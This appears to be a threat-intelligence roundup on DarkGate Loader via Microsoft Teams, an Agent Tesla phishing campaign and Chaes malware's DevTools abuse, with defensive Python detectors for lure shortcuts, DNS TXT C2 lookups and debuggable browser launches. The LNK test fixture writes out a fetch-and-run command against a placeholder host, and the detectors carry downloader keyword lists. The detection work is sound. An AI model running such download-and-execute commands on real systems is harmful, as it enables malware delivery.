
CTI Roundup: Hackers Target Microsoft Teams with DarkGate Loader Malware

Hackers target Microsoft Teams with DarkGate Loader malware, phishing campaign leverages the new Agent Tesla variant, and Chaes malware uses the Chrome DevTools protocol to steal data

Emerging Issue

In this week’s roundup, CTI investigates a Microsoft Teams-related campaign that delivers DarkGate Loader malware. Next up is an overview of a phishing campaign that is spreading a new Agent Tesla variant. Finally, CTI looks into an advanced Chaes malware variant that uses a custom implementation of the Google DevTools protocol to obtain direct access to browser functions.

1. Hackers target Microsoft Teams with DarkGate Loader Malware

Truesec recently investigated a Microsoft Teams campaign that delivers DarkGate Loader malware to victims. In this campaign, threat actors send compromised chat messages to external Office 365 accounts and use social engineering to trick victims into downloading and opening malicious files.

Who is sending DarkGate Loader?

Truesec used Microsoft Purview’s eDiscovery tool to search for the senders in Microsoft Teams. They identified the two senders as:

Researchers confirmed that these two accounts were compromised via unknown malware and put up for sale on the dark web in August 2023. They pivoted to gather more information on the O365 tenant that the accounts belonged to, using the listed domains to search for additional messages.

Both senders used an identical lure containing a link to a file. The file is called “Changes to the vacation” and is hosted on SharePoint. If the victim clicks on the URL in the Teams message, they are directed to the SharePoint site where the file is available for download. Microsoft Defender has since identified the file as “BAT/Tisifi.A#.”

Analyzing the malware

The downloaded ZIP file contains a malicious LNK file posing as a PDF document. Truesec extracted the command line the shortcut would execute and found that it triggers the download and execution of another file.

The commands use a Windows version of cURL, renamed to wbza, to download and execute Autoit3.exe and the bundled script eszexz.au3. The pre-compiled AutoIT script hides its code in the middle of the file; the loader locates it by searching for a set of magic bytes.

AutoIT drops a new file containing shellcode and checks whether Sophos antivirus is installed before executing it. If Sophos is absent, additional code in the AutoIT script is deobfuscated to launch the shellcode. The shellcode then builds a new file in memory byte by byte using a stacked-strings technique; the resulting payload can be extracted from memory and analyzed. VirusTotal identified the payload as DarkGate Loader.
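The shortcut lure described above lends itself to a simple triage check. The following parser is an added example, not Truesec's or Tanium's code: it reads the ShellLinkHeader and StringData sections defined in MS-SHLLINK, flags shortcuts whose name carries a document-style double extension, and flags launch strings that name the renamed cURL binary (wbza), AutoIt or a download URL. It builds its own constructed sample; the cmd.exe relative path, the argument string and the example.invalid URL in that sample are assumptions, not the campaign's actual values.

```python
"""Triage .lnk shortcuts that pose as documents, as in the DarkGate Loader
campaign above. Added example, not Truesec's or Tanium's code: it reads the
ShellLinkHeader and StringData sections defined in MS-SHLLINK and flags
shortcuts whose name mimics a document and whose launch string references
a curl-style downloader or AutoIt. The sample .lnk bytes are constructed."""
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# CLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shortcut without resolving its target."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != SHELL_LINK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:        # skip the item ID list
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize counts itself
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            fields[key] = ""
            continue
        (count,) = struct.unpack_from("<H", data, pos)  # characters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + count * 2].decode("utf-16-le")
            pos += count * 2
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")
# wbza, Autoit3 and .au3 are the component names reported for this campaign
SUSPICIOUS_TOKENS = ("curl", "wbza", "autoit3", ".au3", "http://", "https://")


def triage_lnk(filename: str, data: bytes) -> list:
    """Return the reasons a shortcut looks like a document lure (empty if none)."""
    fields = parse_lnk(data)
    reasons = []
    lowered = filename.lower()
    if lowered.endswith(".lnk") and lowered[:-4].endswith(DOC_EXTENSIONS):
        reasons.append("double extension mimics a document")
    launch = " ".join(fields[k] for k in ("relative_path", "arguments", "icon_location")).lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in launch]
    if hits:
        reasons.append("launch string references " + ", ".join(hits))
    return reasons


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode shortcut carrying only RelativePath and
    Arguments (no ID list, no LinkInfo), for offline testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, SHELL_LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


# Constructed lure modelled on the reported chain; path, arguments and URL are placeholders.
SAMPLE_LNK = build_sample_lnk(
    r"..\..\Windows\System32\cmd.exe",
    "/c wbza -o Autoit3.exe http://example.invalid/a && Autoit3.exe eszexz.au3",
)

if __name__ == "__main__":
    for reason in triage_lnk("Changes to the vacation.pdf.lnk", SAMPLE_LNK):
        print("ALERT:", reason)
```

The parser deliberately never resolves the shortcut target, so it is safe to run over quarantined attachments; real-world shortcuts usually also carry an ID list and LinkInfo block, which the parser skips by their declared sizes.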

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“This is not the first time that threat actors have leveraged Microsoft Teams for malicious activity. For example, Microsoft recently identified a campaign in which Russian threat actors were targeting organizations through Teams with the intent of tricking victims into approving MFA requests via social engineering.”

“Microsoft has previously provided some recommendations on how to help protect against these attacks. However, this ultimately comes back to the importance of security awareness training and education.”

2. Phishing campaign leverages the new Agent Tesla variant

Fortinet recently observed a phishing campaign that is spreading a new Agent Tesla variant. The campaign exploits two older vulnerabilities from 2017 and 2018.

Despite fixes for these vulnerabilities being released several years ago, they are still popular among threat actors — suggesting there are still unpatched devices in the wild years later.

The phishing email

The two vulnerabilities exploited in this campaign are CVE-2017-11882 and CVE-2018-0802. Both are remote code execution (RCE) vulnerabilities that result in memory corruption inside the EQNEDT32.exe process when parsing the crafted equation data. Exploitation of these can lead to arbitrary code execution.

The attached Excel file in the phishing email is in object linking and embedding (OLE) format and contains crafted equation data that exploits these vulnerabilities, ultimately executing a malicious shellcode.

When the victim opens the attached file, Excel will display a deceptive message to the user while executing the shellcode inside the crafted equation data in the background. The malicious equation data is parsed automatically by an MS Office process, EQNEDT32.exe, triggering the CVE-2017-11882/CVE-2018-0802 vulnerability and subsequently the malicious shellcode.

After self-decryption, the shellcode’s main job is to download and execute an additional malware file. To do so, it will call several APIs to download the malware to a local folder and run it on the victim’s device.

The downloaded file

The downloaded file, dasHost.exe, is a .NET program protected by two packers. It extracts two fileless execution modules — one being the payload module of Agent Tesla and the other being a loader module for that payload.

Agent Tesla payload

The primary function of this payload, aside from persistence, is to perform process hollowing, place a decrypted executable file into the hollowed process, and execute it. This decrypted executable file is the core module of Agent Tesla.

Inside the payload module, the malware runs a command that creates a task in the system Task Scheduler, set to start at login. The core module also adds an auto-run entry in the system registry so that it launches automatically at system startup.

The Agent Tesla core module gathers information from the device, including credentials saved by certain software, logged keystrokes, and screenshots. It can steal credentials from specified software installed on the device, including web browsers, email clients, and FTP clients, among others.

Agent Tesla has multiple ways of submitting the stolen data including using the HTTP POST method or as the body of an email over SMTP. This variant chooses to exfiltrate the data over email. The SMTP server address and port are both hardcoded into this variant.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“This campaign is only successful because it exploits two vulnerabilities. Every day, Fortinet observes and mitigates roughly 3,000 attacks and around 1,300 vulnerable devices — a reminder of how important timely patching can be.”

“This activity also highlights the fact that threat actors do not simply move on from a vulnerability once a patch is released and may attempt exploitation for years to come.”

3. Chaes malware uses the Chrome DevTools protocol to steal data

A new, advanced Chaes malware variant has emerged that uses a custom implementation of the Chrome DevTools protocol to directly access the victim’s browser functions and steal data using WebSockets. The infection chain involves deceptive MSI installers that trigger a multi-step infection using seven distinct modules to perform various functions.

What is Chaes malware?

Chaes has been around since at least November 2020, with its first surge occurring during the fourth quarter of 2021. It was characterized by its ability to steal financial data related to MercadoLibre and its use of multiple programming languages.

In 2022 the malware was updated with a refined infection chain, enhanced C2 communication, new modules, and WMI adoption for data collection. The fourth and latest version of Chaes contains significant enhancements including refined code architecture and improved modularity, added layers of encryption, a predominant shift to Python, WebSockets for communication, and more.

Chaes initialization and beaconing

The initialization phase of the malware is responsible for setting persistence on the system and migrating execution to run inside the memory of legitimate processes. A script allows the malware to stay encrypted on disk and for modules to be decrypted and loaded only during runtime. The initialization will happen only if the current running instance is unique, the implant isn’t running, and the executing process is Python (or one of its copies), which indicates that the malware needs to be initialized on the system.

After the initialization phase, the malware exits the current process, and the rest of the execution continues from one of the injected processes. The implant runs in an infinite loop, performing C2 communications. The implant resolves the C2’s WebSocket URL using a DNS TXT request to a hard-coded address.
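The C2 resolution step above, a DNS TXT lookup that returns a WebSocket URL, is unusual enough to hunt for directly in resolver logs. The following detection is an added example, not Morphisec's or Tanium's code. The log lines are constructed, the beacon and C2 hostnames are placeholders, and the tab-separated layout (timestamp, client, qname, qtype, rdata) is an assumed stand-in for whatever your resolver actually emits.

```python
"""Hunt resolver logs for C2 WebSocket URLs delivered in DNS TXT answers, the
resolution technique described for the Chaes implant above. Added example,
not Morphisec's or Tanium's code. The log lines are constructed and the
tab-separated layout (timestamp, client, qname, qtype, rdata) is an assumed
stand-in for whatever your resolver actually emits."""
import re
from collections import Counter

# Constructed resolver log; the beacon and C2 hostnames are placeholders.
SAMPLE_LOG = """\
2023-09-05T10:01:02Z\t10.0.0.15\texample.com\tTXT\t"v=spf1 include:_spf.example.com -all"
2023-09-05T10:01:05Z\t10.0.0.15\t_dmarc.example.com\tTXT\t"v=DMARC1; p=reject"
2023-09-05T10:02:10Z\t10.0.0.42\tcfg.beacon-placeholder.test\tTXT\t"wss://c2-placeholder.test:443/ws"
2023-09-05T10:02:11Z\t10.0.0.42\tcfg.beacon-placeholder.test\tTXT\t"wss://c2-placeholder.test:443/ws"
2023-09-05T10:03:00Z\t10.0.0.7\tselector1._domainkey.example.com\tTXT\t"v=DKIM1; k=rsa; p=MIIB"
"""

# TXT records that legitimately dominate enterprise traffic (SPF, DKIM, DMARC)
LEGIT_TXT_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1")
URL_IN_TXT = re.compile(r"\b(wss?|https?)://[^\s\"']+", re.IGNORECASE)


def parse_log(text: str) -> list:
    """Split the constructed log into dicts; quoted rdata is unquoted."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype, rdata = line.split("\t", 4)
        records.append({"ts": ts, "client": client, "qname": qname,
                        "qtype": qtype, "rdata": rdata.strip('"')})
    return records


def suspicious_txt(records: list) -> list:
    """Alert on TXT answers that carry a URL and are not a known record kind.
    A WebSocket scheme in TXT data has no common legitimate use, so it ranks high."""
    alerts = []
    for r in records:
        if r["qtype"] != "TXT" or r["rdata"].lower().startswith(LEGIT_TXT_PREFIXES):
            continue
        m = URL_IN_TXT.search(r["rdata"])
        if m:
            alerts.append({
                "client": r["client"], "qname": r["qname"], "url": m.group(0),
                "severity": "high" if m.group(1).lower().startswith("ws") else "medium",
            })
    return alerts


def repeat_txt_lookups(records: list, threshold: int = 2) -> dict:
    """Clients re-querying the same TXT name; a beacon re-resolves its C2 in a loop."""
    counts = Counter((r["client"], r["qname"]) for r in records if r["qtype"] == "TXT")
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for a in suspicious_txt(recs):
        print(f"[{a['severity']}] {a['client']} -> {a['qname']} TXT carries {a['url']}")
    for (client, qname), n in repeat_txt_lookups(recs).items():
        print(f"{client} resolved {qname} TXT {n} times")
```

Mail-authentication records (SPF, DKIM, DMARC) account for most legitimate TXT traffic, so they are allow-listed by prefix; anything else that carries a URL, and in particular a ws:// or wss:// scheme, is worth a look, and a host that keeps re-resolving the same TXT name matches the implant's infinite C2 loop.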

Additional modules

Seven modules were identified that can be updated independently without changing the core functionality. Each module can be sent by the threat actor to be run on the infected system.

While many of the modules were present in previous versions, this version provides a re-implementation for those with improved functionalities, different code base, and unique techniques.

  1. Init: This is the first module sent by the threat actor. It acts as an identification/new victim registration. It will gather data on the infected system.
  2. Online: This module sends an “online” message back to the threat actor and acts like a beaconing module to monitor which of the victims are still active.
  3. Chronod: This is a credential stealer and clipper. It is responsible for intercepting browser activity to steal information from the user.
  4. Appita: This is similar to the previous module in structure and purpose. It specifically targets the Itau Bank’s application.
  5. Chrautos: This is an improved module based on Chronod and Appita with better code architecture. It has the capacity to expand the targets and tasks and currently focuses on banking and WhatsApp data.
  6. Stealer: This module is responsible for stealing data from Chromium-based browsers including login data, credit cards, cookies, and autofill.
  7. File upload: This module has the capability to search and upload files from the infected system to the C2 server. In the current version, the module uploads only data related to MetaMask’s Chrome extension.

Google DevTools protocol abuse

The malware uses Google’s DevTools protocol to connect to the current browser instance. This protocol allows for direct communication with the browser’s inner functionality over WebSockets. It enables the threat actor to run scripts, intercept network requests, read POST bodies before they are encrypted, and much more.

The Chrautos module leverages Google’s DevTools protocol to actively open a service’s website and steal all relevant data instead of waiting for the targeted service to be opened by the user.
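The DevTools protocol is only reachable over WebSockets when the browser has been started with a remote-debugging endpoint, which on Chromium-family browsers means the --remote-debugging-port or --remote-debugging-pipe switch. That makes the browser's launch command line a useful place to detect the abuse described above. The check below is an added example, not Morphisec's or Tanium's code; the process events are constructed, and the field names (Image, CommandLine, ParentImage) mirror Sysmon process-creation events as an assumption about your telemetry.

```python
"""Flag Chromium-family browsers started with a remote-debugging endpoint, the
precondition for driving a browser over the DevTools protocol as the Chaes
Chrautos module does. Added example, not Morphisec's or Tanium's code. The
process events are constructed; the field names (Image, CommandLine,
ParentImage) mirror Sysmon process-creation events and are an assumption."""
import re

CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe",
                     "opera.exe", "vivaldi.exe"}
# Parents that rarely launch a debuggable browser outside of malware or automation
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Chromium switches that expose the DevTools protocol (port: WebSocket listener,
# pipe: inherited file descriptors)
DEBUG_SWITCH = re.compile(r"--remote-debugging-(port|pipe)(?:=(\S*))?", re.IGNORECASE)

# Constructed events: a normal launch, a scripted one, and a developer-style one
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                    r"--remote-debugging-port=9222 --user-data-dir=C:\Users\u\AppData\Local\Temp\p",
     "ParentImage": r"C:\Users\u\AppData\Local\Programs\Python\Python311\pythonw.exe"},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-pipe',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: dict):
    """Return an alert dict if the event is a debuggable browser launch, else None."""
    image = basename(event["Image"])
    if image not in CHROMIUM_BROWSERS:
        return None
    m = DEBUG_SWITCH.search(event["CommandLine"])
    if not m:
        return None
    parent = basename(event["ParentImage"])
    headless = "--headless" in event["CommandLine"].lower()
    # A script-host parent or a headless session points to automation, not a person
    severity = "high" if parent in SCRIPT_HOSTS or headless else "medium"
    return {"image": image, "switch": m.group(0), "parent": parent,
            "headless": headless, "severity": severity}


def scan(events: list) -> list:
    return [alert for alert in map(classify_event, events) if alert]


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['parent']} started {a['image']} with {a['switch']}")
```

Browser-automation frameworks and developers use the same switches legitimately, so in production the rule should allow-list known automation hosts and accounts rather than fire on every debuggable launch; the parent-process and headless signals are what separate the scripted, Python-driven launches this malware relies on from a developer's own session.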

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“Chaes malware has been evolving for a few years now. Its latest use of Google’s DevTools protocol further supports this.”

“According to researchers, this is the first notable case of malware to feature a custom implementation of this DevTools protocol to perform malicious operations. That said, it will be interesting to see if other malware families begin to leverage this moving forward.”


Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.
